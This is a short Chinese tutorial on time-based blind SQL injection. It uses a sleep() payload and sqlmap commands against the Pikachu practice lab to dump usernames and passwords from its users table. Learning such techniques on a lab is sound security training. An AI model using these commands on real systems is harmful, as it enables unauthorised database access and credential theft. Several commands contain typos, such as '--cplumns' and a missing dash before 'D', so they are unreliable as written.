sql注入之时间注入

时间注入是盲注入的一种,利用的场景是当目标无法使用布尔盲注获得数据可以使用这种基于时间延迟的注入
利用语法
select if(length(database())>1,sleep(5),0)
这里的意思是数据名的长度如果大于1就延时5秒返回结果
这种注入方式还是使用sqlmap进行利用
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql
这里–technique=T 是指定注入的类型位时间延长注入
sql注入之时间注入_第1张图片
可以看出sqlmap检测出来了,接下来查看当前库名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --current-db --threads 10 --batch
sql注入之时间注入_第2张图片

当前库名为pikachu,跑表名
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --tables -D pikachu --batch

sql注入之时间注入_第3张图片
列出字段
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql --cplumns -T users -D pikachu --batch

出数据
sqlmap -u " http://192.168.1.11/06/vul/sqli/sqli_blind_t.php?name=lili&submit=1" -p name --technique=T -v 1 --dbms mysql -C “username,password” -T users D pikachu – threads 10 --batch

你可能感兴趣的:(sqi注入,sql,数据库,安全)